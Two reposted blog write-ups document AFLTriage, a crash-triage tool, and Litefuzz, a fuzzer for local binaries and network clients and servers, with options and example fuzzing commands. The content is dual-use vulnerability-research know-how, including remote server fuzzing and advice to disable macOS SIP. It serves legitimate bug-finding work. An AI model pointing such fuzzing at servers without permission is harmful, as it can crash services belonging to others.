
AFLTriage - Tool To Triage Crashing Input Files Using A Debugger

By: Zion3R
9 December 2021 at 20:30


AFLTriage is a tool to triage crashing input files using a debugger. It is designed to be portable and not require any run-time dependencies, besides libc and an external debugger. It supports triaging crashes generated by any program, not just AFL, but recognizes AFL directories specially, hence the name.

Some notable features include:

  • Multiple report formats: text, JSON, and raw debugger JSON
  • Parallel crash triage
  • Crash deduplication
  • Sanitizer report parsing
  • Supports binary targets with or without symbols/debugging information
  • Source code and variables will be annotated in reports for context

Currently AFLTriage only supports GDB and has only been tested on Linux C/C++ targets. Note that AFLTriage does not classify crashes by potential exploitability. Accurate exploitability classification is very target- and scenario-specific and is best left to specialized tools and expert analysts.


Usage

Usage of AFLTriage is quite straightforward. You need the inputs to triage, an output directory for reports, and the target binary with its arguments.

Example:

$ afltriage -i fuzzing_directory -o reports ./target_binary --option-one @@
AFLTriage v1.0.0

[+] GDB is working (GNU gdb (Ubuntu 8.1.1-0ubuntu1) 8.1.1 - Python 3.6.9 (default, Jan 26 2021, 15:33:00))
[+] Image triage cmdline: "./target_binary --option-one @@"
[+] Reports will be output to directory "reports"
[+] Triaging AFL directory fuzzing_directory/ (41 files)
[+] Triaging 41 testcases
[+] Using 24 threads to triage
[+] Triaging [41/41 00:00:02] [####################] CRASH: ASAN detected heap-buffer-overflow in buggy_function after a READ leading to SIGABRT (si_signo=6) / SI_TKILL (si_code=-6)
[+] Triage stats [Crashes: 25 (unique 12), No crash: 16, Errored: 0]

Similar to AFL, the @@ is replaced with the path of the file to be triaged. AFLTriage will take care of the rest.

Building and Running

You will need a working Rust build environment. Once you have Cargo and Rust installed, building and running is simple:

cd afltriage-rs/
cargo run --help

<compilation>

Finished dev [unoptimized + debuginfo] target(s) in 0.33s
Running `target/debug/afltriage --help`

<AFLTriage usage>
...

Extended Usage

afltriage 1.0.0
Quickly triage and summarize crashing testcases

USAGE:
afltriage -i <input>... -o <output> <command>...

OPTIONS:
-i <input>...
A list of paths to a testcase, directory of testcases, AFL directory, and/or directory of AFL directories to
be triaged. Note that this arg takes multiple inputs in a row (e.g. -i input1 input2...) so it cannot be the
last argument passed to AFLTriage -- this is reserved for the command.
-o <output>
The output directory for triage report files. Use '-' to print entire reports to console.

-t, --timeout <timeout>
The timeout in milliseconds for each testcase to triage. [default: 60000]

-j, --jobs <jobs>
How many threads to use during triage.

--report-formats <report_formats>...
The triage report output formats. Multiple values allowed: e.g. text,json. [default: text] [possible
values: text, json, rawjson]
--bucket-strategy <bucket_strategy>
The crash deduplication strategy to use. [default: afltriage] [possible values: none, afltriage,
first_frame, first_frame_raw, first_5_frames, function_names, first_function_name]
--child-output
Include child output in triage reports.

--child-output-lines <child_output_lines>
How many lines of program output from the target to include in reports. Use 0 to mean unlimited lines (not
recommended). [default: 25]
--stdin
Provide testcase input to the target via stdin instead of a file.

--profile-only
Perform environment checks, describe the inputs to be triaged, and profile the target binary.

--skip-profile
Skip target profiling before input processing.

--debug
Enable low-level debugging output of triage operations.

-h, --help
Prints help information

-V, --version
Prints version information


ARGS:
<command>...
The binary executable and args to execute. Use '@@' as a placeholder for the path to the input file or
--stdin. Optionally use -- to delimit the start of the command.
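
Putting the options together, a hypothetical invocation that triages two AFL sync directories, writes JSON reports and buckets crashes by the first stack frame might look like this (directory and binary names are placeholders):

afltriage -i output/fuzzer1 output/fuzzer2 -o reports --report-formats json --bucket-strategy first_frame -- ./target_binary --option-one @@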


Litefuzz - A Multi-Platform Fuzzer For Poking At Userland Binaries And Servers

By: Zion3R
3 March 2022 at 11:30


Litefuzz is meant to serve a purpose: fuzz and triage on all the major platforms, supporting CLI/GUI apps as well as network clients and servers, in order to find security-related bugs. It simplifies the process and makes it easy to discover security bugs in many different targets, across platforms, while just making a few honest trade-offs.


It isn't built for speed, scalability or meant to win any prizes in academia. It applies simple techniques at various angles to yield results. For console-based file fuzzing, you should probably just use AFL. It has superior performance, instrumentation capabilities (and faster non-instrumented execs), scale and can make freakin' jpegs out of thin air. For network fuzzing, the Mutiny fuzzer also works well if you have PCAPs to replay, and frizzer looks promising as well. But if you want to give this one a try, it can fuzz those kinds of targets across platforms with just a single tool.

./ and give your target... a lite fuzz.

$ sudo apt install latex2rtf

$ ./litefuzz.py -l -c "latex2rtf FUZZ" -i input/tex -o crashes/latex2rtf -n 1000 -z
--========================--
--======| litefuzz |======--
--========================--

[STATS]
run id: 3516
cmdline: latex2rtf FUZZ
crash dir: crashes/latex2rtf
input dir: input/tex
inputs: 1
iterations: 1000
mutator: random(mutators)

@ 1000/1000 (3 crashes, 127 duplicates, ~0:00:00 remaining)

[RESULTS]
> completed (1000) iterations with (3) unique crashes and 127 dups
>> check crashes/latex2rtf for more details

This is a simple local target which AFL++ is perfectly capable of handling, given here as a quick example. Litefuzz was designed to do much more in the way of network and GUI fuzzing, which you'll see once you dive in.

why

Yes, another fuzzer, and one that doesn't track all that well with current trends and conventions. Trade-offs were made to address certain requirements: a fuzzer that works by default on multiple platforms, fuzzes both local and network targets, and is very easy to use. Not trying to convince anybody of anything, but let's provide some context. Some targets require a lot of effort to integrate fuzzers such as AFL into the build chain. This is not a problem here, as this fuzzer does not require instrumentation, sacrificing the precise coverage gained by instrumentation for ease and portability. AFL also doesn't support network fuzzing out of the box, and while there are projects based on it that do, they are far from straightforward to use and usually require more code modifications and harnesses to work (similar story with Libfuzzer). It doesn't do parallel fuzzing, nor support anything like the blazing speed improvements that persistent mode can provide, so it cannot scale anywhere close to fuzzers with such capabilities. Again, this is not a state-of-the-art fuzzer. But it doesn't require source code, properly setting up a build, or certain OS features. It can even fuzz some network client GUIs and interactive apps. It lives off the land in a lot of ways, and many of the features such as mutators and minimization were written from scratch.

It was designed to "just work" and effort has been put into automating the setup and installation of the few dependencies it needs. This fuzzer was written to serve a purpose: to provide value in a lot of different target scenarios and environments and, most importantly, to deliver on what all fuzzers should ultimately be judged on: the ability to find bugs. And it does find bugs. It doesn't presume there is target source code, so it can cover closed source software fairly well. It can run as part of automation with little modification, but is geared towards being fun to use for vulnerability researchers. It is, however, more helpful to think of it as an R&D project rather than a fully-fledged product. Also, there's no complicated setup where it's slightly broken out of the box or needs more work to get it running on modern operating systems. It's been tested working on Ubuntu Linux 20.04, Mac OS 11 and Windows 10 and comes with fully functional scripts that do just about everything for you in order to set up a ready-to-fuzz environment.

Once the setup script completes, it only takes a few minutes to get started fuzzing a ton of different targets.

how it works

Litefuzz supports three different modes: local, client and server. Local means targeting local binaries, which on Linux/Mac are launched via subprocess with automatic GDB and LLDB triage support respectively on crashes, and via WinAppDbg on Windows. Crashes are written to a local crash directory and sorted by fault type, such as read/write AVs or SIGABRT/SIGSEGV, along with the file hashes. All unique crashes are triaged as it fuzzes, and this data along with target output (as available) is also captured and placed as artifacts in the same directory. It's also possible to replay crashes with --replay and providing the crashing file. In local client mode, the input directory should contain a server greeting, response or other data that a client would expect when connecting to a server. As of now, only one "shot" is implemented for network fuzzing, with no complex session support. The client is launched via command line and debugged the same as when file fuzzing. A listener is set up to support this scenario; yes, it's slow and borderline manual labor, but it works. If a crash is detected, it is replayed in gdb to get the triage details. In remote client mode, this works the same except there is no local debugging / crash triage. Local server mode is similar to local client mode, and remote server mode just connects to a specified target and sends mutated sample client data that the user specifies as inputs, but only a simple "can we still connect? if not, it probably crashed on the last one" triage is provided.
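
Stripped to its essence, the local-mode loop described above is: write a mutated testcase, run the target, and if it dies on a signal, replay the case under a debugger for triage. A minimal Python sketch of the idea (illustrative only, not Litefuzz's actual code; the timeout value and gdb invocation are assumptions):

import signal
import subprocess

def fuzz_once(cmdline, fuzzfile, data):
    with open(fuzzfile, "wb") as f:
        f.write(data)                        # drop the mutated testcase on disk
    try:
        proc = subprocess.run(cmdline, timeout=5)
    except subprocess.TimeoutExpired:
        return None                          # a hang, not a crash
    if proc.returncode < 0:                  # negative return code = killed by a signal
        # replay inside a debugger to collect a backtrace for the crash artifacts
        subprocess.run(["gdb", "-batch", "-ex", "run", "-ex", "bt", "--args"] + cmdline)
        return signal.Signals(-proc.returncode).name
    return None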

There are a few mutation functions written from scratch which mostly do random mutations with a random selection of inputs specified by the -i flag. For file fuzzing, just select local mode and pass it the target command line with FUZZ denoting where the app expects the filename to parse, eg. tcpdump -r FUZZ along with an input directory of "good files" to mutate. For network client fuzzing, it's similar to local fuzzing, but also provide connection specifics via -a. And if you want to fuzz servers, do server mode and provide a protocol://address:port just like for clients.

It fuzzes as fast as the target can consume the data and exit, such as the case for most CLI applications, or for as long as you've determined it needs before the local execution or network connection times out, which can be much slower. No fancy exec or kernel tricks here. But of course if you write a harness that parses input and exits quickly, covering a specific part of the target, that helps too. At that point though, if you can get that close to the target, you're probably better off using persistent mode or similar features that other fuzzers can offer.

In short...

what it does

  • runs on linux, windows and mac and supports py2/py3
  • fuzzes CLI/GUI binaries that read from files/stdin
  • fuzzes network clients and servers, open source or proprietary, available to debug locally or remote
  • diffs, minimization, replay, sorting and auto-triaging of crashes
  • misc stuff like TLS support, golang binary fuzzing and some extras for Mac
  • mutates input with various built-in mutators + pyradamsa (Linux)

what it doesn't do

  • native instrumentation
  • scale with concurrent jobs
  • complex session fuzzing
  • remote client and server monitoring (only basic checks eg. connect)

support

Primarily tested on Ubuntu Linux 20.04 (lightly tested on 21.04), Windows 10 and Mac OS 11. The fuzzer and setup scripts may work on slightly older or newer versions of these operating systems as well, but the majority of research, testing and development occurred in these environments. Python3 is supported and an effort was made to make the code compatible with Python2 as well, as it's necessary for fuzzing on Windows via WinAppDbg. Platform testing primarily occurred on Intel-based hardware, but things seem to mostly work on Apple's M1 platform too (notable exceptions being that on Linux the exploitable plugin for GDB probably isn't supported, nor is Pyradamsa). There are also setup scripts in setup/ to automate most or all of the tasks and dependency installation. It can generally fuzz native binaries on each platform, which are often compiled in C/C++, but it can also catch crashes for Golang binaries as well (experimental).

python versions

Python3 is supported for Linux and Mac while Python2 is required for Windows.

Why Py3 for Linux and Mac? Pyautogui, Pyradamsa (Linux only), better socket support on Mac.

Why Py2 for Windows? Winappdbg requires Py2.

linux

GDB for debugging and exploitable for crash triage. If it's OSS, you can build and instrument the target with sanitizers and such; otherwise, there are some memory debuggers we can just load at runtime.

This installation along with the python dependencies and other helpful stuff has been automated with setup/linux.sh. Recommended OS is Ubuntu 20.04 as that is where the majority of testing occurred.

mac

Instead of gdb, we use lldb for debugging on OS X as it's included with the XCode command line tools. Being an admin or in the developer group should let you use lldb, but this behavior may differ across environments and versions and you may need to run it with sudo privileges if all else fails.

The one thing you'll manually need to do is turn off SIP (in recovery, via cmd+R or use vmware fusion hacks). Otherwise, auto-triage will fail when fuzzing on Tim Apple's OS.

Almost all of the setup has been automated with the setup/mac.sh script, so you can just run it for a quick start.

windows

WinAppDbg is used for debugging on Windows with the slight caveat that stdin fuzzing isn't supported.

Like the automated setups for the other operating systems, chocolatey helps to automate package installation on windows. Run setup/windows.bat in the litefuzz root directory as Administrator to automate the installations. It will install debugging tools and other dependencies to make things run smoothly.

targets

This is a list of the types of targets that have been tested and are generally supported.

  • Local CLI/GUI apps that parse file formats or stdin

    • debug support
  • Local CLI/GUI network client that parses server responses

    • debug support for CLIs
    • limited debug support for GUIs
  • Local CLI network server that parses client requests

    • debug support (caveat: must be able to run as a standalone executable, otherwise can be treated as remote)
  • Local GUI network server that parses client requests

    • theoretically supported, untested
  • Remote CLI/GUI network client that parses server responses

    • no debug support
  • Remote CLI/GUI network server that parses client requests

    • no debug support
    • the exception being on Mac when using the attach or reportcrash features

Again, the fuzzer can run on and support local apps, clients and servers on Linux, Mac and Windows and of course can fuzz remote stuff independent of the target platform.

triage

  • Local CLI/GUI apps that parse file formats or stdin

    • run app, catch signals, repro by running it again inside a debugger with the crasher
  • Local CLI/GUI network client that parses server responses

    • run app, catch signals, repro by running it again inside a debugger with the crasher
  • Local GUI/CLI network server that parses client requests

    • run app in debugger, catch signals, repro by running it again inside a debugger with the crasher
  • Remote CLI/GUI network client that parses server responses

    • no visibility, collect crashes from the remote side
    • can manually write supporting scripts to aid in triage
  • Remote CLI/GUI network server that parses client requests

    • no visibility, collect crashes from the remote side
    • can manually write supporting scripts to aid in triage (see the sketch after this list)
    • the exceptions on Mac are the attach and reportcrash options, which can be used to enable some triage capabilities
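
A remote-side supporting script of the kind mentioned in the list above can be as simple as watching the target process and preserving whatever the OS leaves behind when it dies. A rough Python sketch (the process name and log path are hypothetical):

import shutil
import subprocess
import time

# poll until the server process disappears, then preserve its log for triage
while subprocess.run(["pgrep", "-x", "serverd"], capture_output=True).returncode == 0:
    time.sleep(1)
print("serverd is gone, collecting artifacts")
shutil.copy("/var/log/serverd.log", "serverd.crash.log")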

getting started

Most of the setup across platforms has been automated with the scripts in the setup directory. Simply run those from the litefuzz root and it should save you a lot of time and help enable some of what's needed for automated deployments. It's useful to use a VM to setup a clean OS and fuzzing environment as among other things its snapshot capabilities come in handy.

See INSTALL.md for details.

tests

unit tests

There are a few simple unit and functional tests to get some coverage for Litefuzz, but it is not meant to be complete.

py2> pytest
py3> python3 -m pytest

This will run pytest for test_litefuzz.py in the main directory and provide PASS/FAIL results once the test run is finished.

crashing app tests

A few examples of buggy apps for testing crash and triage capabilities on the different platforms can be found in the test folder.

  • (a) null pointer dereference
  • (b) divide-by-zero
  • (c) heap overflow
  • (d-gui) format string bug in a GUI
  • (e) buffer overflow in client
  • (f) buffer overflow in server

They are automatically built during setup and you can run them on the command line, in a debugger or use them to test as fuzzing targets. If running on Windows command line, check Event Viewer -> Windows Logs -> Application to see crashes.

options

There are a ton of different options and features to take advantage of various target scenarios. The following is a brief explanation and some examples to help understand how to use them.

crash directory

-o lets you specify a crash directory other than the default, which is crashes/ in the local path. One can use this to manage crash folders for several concurrent fuzzing runs against different apps at the same time.

insulate mode

-u insulates the target application from the normal fuzzing process, eg. execs or sending packets over and over and checking for crashes. Instead, this mode was made for interactive client applications, eg. Postman, where you can script inside the application to repeat connections for client fuzzing. The target is run inside a debugger, the fuzzer is paused to give the user time to click a few buttons or set the target's config to make it run automatically, the user resumes, and now you are fuzzing interactive network clients.

litefuzz -lk -c "/snap/postman/140/usr/share/Postman/_Postman" -i input/http_responses -a tcp://localhost:8080 -u -n 100000 -z

Insulate mode + refresh can be used for interactive clients, eg. run FileZilla in a debugger, but keep hitting F5 to make it reconnect to the server for each new iteration. Also, local CLI/GUI servers being fuzzed are started and run only once inside a debugger, to make the process a little more efficient.

--key also allows you to send keys while fuzzing interactive targets, such as fuzzing FileZilla's parsing of FTP server responses by sending "refresh connection" with F5.

litefuzz -lk -c "filezilla" -a tcp://localhost:2121 -i input/ftp/filezilla -u -pp --key "F5" -n 100 -z glibc

note: insulate mode has only been tested working on Linux and is not supported on Windows.

timeout

-x secs allows you to specify a timeout. In practice, this is more like "approx how long between iterations" for CLI targets and an actual timeout for GUIs.

mutators

--mutator N specifies which mutator to use for fuzzing. If the option is not provided, a random choice from the list of available mutators is chosen for each fuzzing iteration. These mutators were written from scratch (with the exception of Radamsa of course). And while they have been extensively tested and have held up pretty well during millions of iterations, they may have subtle bugs from time to time, but generally this should not affect functionality.

FLIP_MUTATOR = 1
HIGHLOW_MUTATOR = 2
INSERT_MUTATOR = 3
REMOVE_MUTATOR = 4
CARVE_MUTATOR = 5
OVERWRITE_MUTATOR = 6
RADAMSA_MUTATOR = 7

note: Radamsa mutator is only available on Linux (+ Py3).
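
To pin a specific mutator instead of leaving the per-iteration choice random, pass its number, eg. flip-only mutation against a pcap-parsing target (the flag combination here is illustrative):

litefuzz -l -c "tcpdump -r FUZZ" -i test-pcaps --mutator 1 -n 10000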

ReportCrash

--reportcrash is mac-specific. Instead of using the default triage system, it instructs the fuzzer to monitor the ReportCrash directory for crash logs for the target process. ReportCrash must be enabled on OS X (default enabled, but usually disabled for normal fuzzing). This feature is useful in scenarios where we can't run the target in a debugger to generate and triage our own crash logs, but we can utilize this core functionality on the operating system to gain visibility.

note: consider this feature experimental as we're relying on a few moving parts and components we don't directly control within the core MacOS system. ReportCrash may eventually stop working properly and responding after fuzzing for a while even after attempting to unload and reload it, so one can try rebooting the machine or resetting the snapshot to get it back in good shape.

sudo launchctl unload -w /System/Library/LaunchAgents/com.apple.ReportCrash.plist
sudo launchctl load -w /System/Library/LaunchAgents/com.apple.ReportCrash.plist
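
Conceptually, the monitoring amounts to polling the crash-log directory for new reports naming the target process. A small Python sketch of the idea (assuming reports land in ~/Library/Logs/DiagnosticReports, which can vary by macOS version; the process name is a placeholder):

import glob
import os
import time

logdir = os.path.expanduser("~/Library/Logs/DiagnosticReports")
pattern = os.path.join(logdir, "MyTarget*")   # crash logs are prefixed with the process name
seen = set(glob.glob(pattern))
while True:
    for log in set(glob.glob(pattern)) - seen:
        print("new crash report:", log)       # pair it with the last payload sent
        seen.add(log)
    time.sleep(1)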

pause

Hit ctrl+c to pause the fuzzing process, then choose y to resume or n to stop. This feature works ok across platforms, but may be less reliable when fuzzing GUI apps.

reusing crashes for variant finding

-e enables reuse mode. This means that if any crashes were found during the fuzzing run, they will be used as inputs for a second round of fuzzing which can help shake out even more bugs. Combine with -z for -ez bugs! Da-duph.

The following example fuzzes antiword for 100000 iterations, then starts another run with the same iteration count and options, reusing the crashes as input to try and grind out even more bugs.

litefuzz -l -c "antiword FUZZ" -i docs -n 100000 -ez

(or one could manually copy over crashes to an input directory to directly control the iterations for the reuse run)

litefuzz -l -c "antiword FUZZ" -i docs-crashes -n 500000 -z

note: this mode is supported for local apps only.

memory debugging helpers

-z enables Electric Fence (or glib malloc debugging as fallback) on Linux, Guard Malloc on Mac and PageHeap on Windows. Also, -zz can be used to disable PageHeap after enabling it for an application. If you want to just flip it on/off without starting the fuzzer, just leave out the -i flag. During Windows setup, gsudo is installed and can be used to run elevated commands on the command line, such as turning on PageHeap for targets.

sudo litefuzz -l -c "notepad FUZZ" -i texts/files -z

sudo litefuzz -l -c "notepad FUZZ" -zz

On Linux, specific helpers can be chosen. For example, instead of just using glib malloc as a fallback, it can be selected.

litefuzz -l -c "geany FUZZ" -i texts/codes -z glibc

The default Electric Fence malloc debugger is great, but it doesn't work with all targets. You can test the target with EF and if it crashes, select the glibc helper instead.
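
For context, these helpers are preload-style malloc debuggers: on Linux the library is injected into the target at runtime rather than compiled in, conceptually something like the following (the exact library path varies by distro, and this is an assumption about the mechanism rather than Litefuzz's literal implementation):

LD_PRELOAD=/usr/lib/libefence.so ./target testcase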

checking live target output

If fuzzing local apps on Linux or Mac, you can cat /tmp/litefuzz/RUN_ID/fuzz.out to check what the latest stdout was from the target. RUN_ID is shown in the STATS information area when fuzzing begins. In the event that a crash occurs, stdout is also captured in the crashes directory as the .out file. Global stdout/stderr also goes to /tmp/litefuzz/out for debugging purposes for all fuzzing targets, with the exception of insulated or local server modes, whose debugger output goes to /tmp/litefuzz/RUN_ID/out. Winappdbg doesn't natively support capturing stdout of targets (AFAIK), so this artifact is not available on Windows.

client and server modes

If the server can be run locally simply by executing the binary (with or without some flags and configuration), you can pass its command line with -c and it will be started, fuzzed and killed with a new execution every iteration. The idea here is trading speed for the ability to avoid those annoying bugs which only trigger after the target's memory is in a "certain state", which can lead to false positives. Same deal with locally fuzzing network clients. It even supports TLS connections, generating certificates for you on the fly (allowing the user to provide a client cert when fuzzing a server that requires it; certificate fuzzing itself is another idea here). Debugging support is not provided by Litefuzz when fuzzing remote clients and servers, so setup on that remote end is up to the user. For servers, we simply check if the server stopped responding and note the previous payload as the crasher. This works fine for TCP connections, but we don't quite have this luxury for UDP services, so monitoring the remote server is left up to either the ReportCrash feature (available on Mac), running the target in a debugger (via local server mode or manually) or crafting custom supporting scripts. Also, some servers may auto-restart or otherwise recover after crashing, but there may be signs of this in the logs or other artifacts on the filesystem which can be parsed by supporting scripts written for a particular target.
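
For TCP targets, the "did the server stop responding" check described above boils down to a connect probe between iterations. A minimal Python sketch of the idea:

import socket

def server_alive(host, port, timeout=1.0):
    # if the TCP handshake fails, assume the previous payload was the crasher
    try:
        with socket.create_connection((host, port), timeout=timeout):
            return True
    except OSError:
        return False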

local network examples

litefuzz -lk -c "wget http://localhost:8080" -a tcp://localhost:8080 -i input/http -z

litefuzz -lk -c "curl -k https://localhost:8080" -a tcp://localhost:8080 -i input/http -z

litefuzz -lk -c "curl -k https://localhost:8080" -a tcp://localhost:8080 -i input/http -o crashes/curl --tls -n 100000 -z

(open Wireshark and capture the response from a d, right click Simple Network Management Protocol -> Export Packet Bytes -> resp.bin)

litefuzz -lk -c "snmpwalk -v 2c -c public localhost:1616 1.3.6.1.2.1.1.1" -a udp://localhost:1616 -i input/snmp/resp.bin -n 1 -d -x 3

litefuzz -ls -c "./sc_serv shoutcast.conf" -a localhost:8000 -i input/shouts -z

litefuzz -ls -c "snmpd" -i input/snmp -a udp://localhost:161 -z

quick notes

  • UDP sockets can act a little strange on Mac + Py2, so only Mac + Py3 has been tested and supported
  • Local network client fuzzing on Windows can be buggy and should be considered experimental at this time

remote network examples

Fuzzing remote clients and servers is a bit more challenging: we have no local debugging and rely on catching a halt in the interaction between the two parties over the network to detect crashes. Also, since we are assumedly blind to what's happening on the other end, fuzzing ends when the client or server stops responding, and it needs to be restarted manually after the client or server is restored to a normal (uncrashed) state, unless the user has set up scripts on the remote side to manage this process. Again, UDP complicates this further. Even sending a test packet to see if there's a listening service on a UDP port doesn't guarantee a reply. So it's possible to remotely fuzz network clients and servers, but there's a trade-off on visibility.

client

while :; do echo "user test\rpass test\rls\rbye\r" | ftp localhost 2121; sleep 1; done

litefuzz -k -i input/ftp/test -a tcp://localhost:2121 -pp -n 100

Client mode is more finicky here because it's hard to tell whether a client has actually crashed and so isn't reconnecting, or if the send/recv dance is just off, as different clients can handle connections however they like. Also note that this is just an example and that remote client fuzzing by nature is tricky and should be considered somewhat experimental.

server

The pros and cons of fuzzing a server locally or remotely can help you decide how to approach a target when both options are available. Basically, fuzzing with the server in a debugger is going to be slower, but you'll be able to get crash logs with the automatic triage, whereas fuzzing the server in remote mode (even pointing it to localhost) will be much faster on average, but you lose the high-visibility, debugger-based triage capabilities. It will, however, give you time to manually restart the server after each crash to keep going before the fuzzer exits (TCP servers only; this feature does not support UDP-based servers).

Shoutcast

./sc_serv ...

litefuzz -s -a localhost:8000 -i input/shouts -n 10000

SSHesame

sshesame

litefuzz -s -a tcp://target:2022 -i input/ssh-server -p -n 1000000 -x 0.05

FTP

litefuzz -s -a tcp://target:21 -i input/ftp/req.txt -pp -n 1000

DNS

coredns -dns.port 10000

litefuzz -ls -c "coredns -dns.port 10000" -a udp://localhost:10000 -i dns-req/1.bin -o crashes/coredns -n 10000

or

litefuzz -s -a udp://localhost:10000 -i dns-req/1.bin -o crashes/coredns -n 10000

TLS

litefuzz -s -a tcp://hostname:8080 -i input/http --tls -n 10000

...
@ 48/10000 (1 crashes, 0 duplicates, ~7:13:18 remaining)

[!] check target, sleeping for 60 seconds before attempting to continue fuzzing...

note: the default remote server mode delays between fuzzing iterations make fuzzing sessions run reliably, but are pretty slow; this is the safe default, but one can use -x to set very fast timeouts between sessions (as shown above) if the target is OK parsing packets very quickly, a setup unofficially nicknamed "2fast2furious" mode

For more on session-based protocols (such as FTP or SSH), see Multiple modes.

multiple data exchange modes

-p is for multiple binary data mode, which allows one to supply sequential inputs, eg. an input/ssh directory containing files named "1", "2", "3", etc. for each packet in the session to fuzz. This is meant to enable fuzzing of binary-based protocol implementations, such as an SSH client.

ls input/ssh
1 2 3 4

xxd input/ssh/2 | head

00000000: 0000 041c 0a14 56ff 1297 dcf4 672d d5c9  ......V.....g-..
00000010: d0ab a781 dfcb 0000 00e6 6375 7276 6532 ..........curve2
00000020: 3535 3139 2d73 6861 3235 362c 6375 7276 5519-sha256,curv
00000030: 6532 3535 3139 2d73 6861 3235 3640 6c69 e25519-sha256@li
00000040: 6273 7368 2e6f 7267 2c65 6364 682d 7368 bssh.org,ecdh-sh
00000050: 6132 2d6e 6973 7470 3235 362c 6563 6468 a2-nistp256,ecdh
00000060: 2d73 6861 322d 6e69 7374 7033 3834 2c65 -sha2-nistp384,e
00000070: 6364 682d 7368 6132 2d6e 6973 7470 3532 cdh-sha2-nistp52
00000080: 312c 6469 6666 6965 2d68 656c 6c6d 616e 1,diffie-hellman
00000090: 2d67 726f 7570 2d65 7863 6861 6e67 652d -group-exchange-

Each packet is consumed into an array, a random index is mutated and replayed to fuzz the target.
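
A stripped-down Python sketch of that consume/mutate/replay idea (illustrative only, not Litefuzz's actual code; socket setup and the replay itself are omitted):

import os
import random

def load_session(indir):
    # packets live in files named "1", "2", "3", ... one packet per file
    names = sorted(os.listdir(indir), key=int)
    return [open(os.path.join(indir, n), "rb").read() for n in names]

packets = load_session("input/ssh")
idx = random.randrange(len(packets))          # pick one packet to mutate
mutated = bytearray(packets[idx])
mutated[random.randrange(len(mutated))] ^= random.getrandbits(8)
packets[idx] = bytes(mutated)
# ...then replay the packets in order against the target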

litefuzz -lk -c "ssh -T test@localhost -p 2222" -a tcp://localhost:2222 -i input/ssh -o crashes/ssh -p -n 250000 -z glibc

And you can check on the target's output for the latest iteration.

cat /tmp/litefuzz/out
kex_input_kexinit: discard proposal: string is too large
ssh_dispatch_run_fatal: Connection to 127.0.0.1 port 2222: string is too large

... and others like

ssh_dispatch_run_fatal: Connection to 127.0.0.1 port 2222: unknown or unsupported key type

ssh_askpass: exec(/usr/bin/ssh-askpass): No such file or directory
Host key verification failed.

Bad packet length 1869636974.
ssh_dispatch_run_fatal: Connection to 127.0.0.1 port 2222: message authentication code incorrect

-pp asks the fuzzer to check inputs for line breaks and if detected, treat those as multiple requests / responses. This is useful for simple network protocol fuzzing for mostly string-based protocol implementations, eg. ftp clients.

cat input/ftp/test
220 ProFTPD Server (Debian) [::ffff:localhost]
331 Password required for user
230 User user logged in
215 UNIX Type: L8
221 Goodbye

The fuzzer breaks each line into its own FTP response to try and fuzz a client's handling of a session. There's no guarantee, however, that a client will "behave"; it may act in ways that don't allow a session to complete properly, so some trial and error plus fine-tuning of session test cases while running Wireshark can be helpful for understanding the differences in interaction between targets.

litefuzz -lk -c "ftp localhost 2121" -a tcp://localhost:2121 -i input/ftp -o crashes/ftp -n 100000 -pp -z

This can also be combined with -u for insulating GUI network targets like FileZilla.

litefuzz -lk -c "filezilla" -a tcp://localhost:2121 -i input/ftp.resp -n 100000 -u -pp -z glibc

attaching to a process

If the target spawns a new process on connection, one can specify the name of a process (or pid) to attach to after a connection has been established to the server. This is handy in cases where eg. launchd is listening on a port and only launches the handling process once a client is connected. This is one feature that sort of blurs the line between local and remote fuzzing, as technically the fuzzer is in remote mode, yet we specify the target address as localhost and ask it to attach to a process.

./litefuzz.py -s -a tcp://localhost:8080 -i input/shareserv -p --attach ShareServ -x 1 -n 100000

note: currently this feature is only supported on Mac (LLDB) and for network fuzzing, although if implemented it should work fine for Linux (GDB) too.

crash artifacts

When a crash is encountered during fuzzing, it is replayed in a debugger to produce debug artifacts and bucketing information. The information varies from platform to platform, but generally a text file is produced with a backtrace, register information, !exploitable type stuff (where available) and other basic information.

Memory dumps can be enabled on Windows by passing --memdump or disabled with --nomemdump, similar to how malloc debuggers are controlled via -z and -zz respectively. If enabled, the dump will also be loaded in the console debugger (cdb) and !analyze -v crash analysis output is captured within an additional memory dump crash analysis log. Winappdbg already provides !exploitable type analysis that we get in the initial crash triage, so we just do !analyze here.

litefuzz -l -c "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" --memdump

or to disable memory dumps for an application

litefuzz -l -c "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" --nomemdump

In addition to auto-crash triage, binary/string diffs (as appropriate) and target stdout (platform / target dependent) are also produced, along with repro files of course.

For local fuzzing, artifacts generally include diffs, stdout (linux/mac only), repro file and the crash log and information file.

$ ls crashes/latex
PROBABLY_EXPLOITABLE_SIGSEGV_XXXX5556XXXX_YYYYa39f3fd719e170234435a1185ee9e596c54e79092c72ef241eb7a41cYYYY.diff
PROBABLY_EXPLOITABLE_SIGSEGV_XXXX5556XXXX_YYYYa39f3fd719e170234435a1185ee9e596c54e79092c72ef241eb7a41cYYYY.diffs
PROBABLY_EXPLOITABLE_SIGSEGV_XXXX5556XXXX_YYYYa39f3fd719e170234435a1185ee9e596c54e79092c72ef241eb7a41cYYYY.out
PROBABLY_EXPLOITABLE_SIGSEGV_XXXX5556XXXX_YYYYa39f3fd719e170234435a1185ee9e596c54e79092c72ef241eb7a41cYYYY.tex
PROBABLY_EXPLOITABLE_SIGSEGV_XXXX5556XXXX_YYYYa39f3fd719e170234435a1185ee9e596c54e79092c72ef241eb7a41cYYYY.txt

On Windows, if memory dumps are enabled, a dump file will be generated and additional triage information will be written to an additional crash analysis log.

C:\litefuzz\crashes> dir
app.exe.14299_YYYYa39f3fd719e170234435a1185ee9e596c54e79092c72ef241eb7a41cYYYY.dmp
app.exe.14299_YYYYa39f3fd719e170234435a1185ee9e596c54e79092c72ef241eb7a41cYYYY.log
....

For remote fuzzing, artifacts may vary depending on the options chosen, but often include diffs, a repro file and/or repro file directory (if input is a session with multiple packets), the previous fuzzing iteration's repro (to avoid losing a bug in case it's actually the crasher, as remote fuzzing has its challenges) and a crash log or brief information file.

ls crashes/serverd
REMOTE_SERVER_testbox.1_NNNN_XXXX9c3f3660aaa76f70515f120298f581adfa9caa8dcaba0f25a2bc0b78YYYY
REMOTE_SERVER_testbox.1_NNNN_PREV_XXXX9c3f3660aaa76f70515f120298f581adfa9caa8dcaba0f25a2bc0b78YYYY
UNKNOWN_XXXX2040YYYY_XXXX9c3f3660aaa76f70515f120298f581adfa9caa8dcaba0f25a2bc0b78YYYY.diff
UNKNOWN_XXXX2040YYYY_XXXX9c3f3660aaa76f70515f120298f581adfa9caa8dcaba0f25a2bc0b78YYYY.diffs
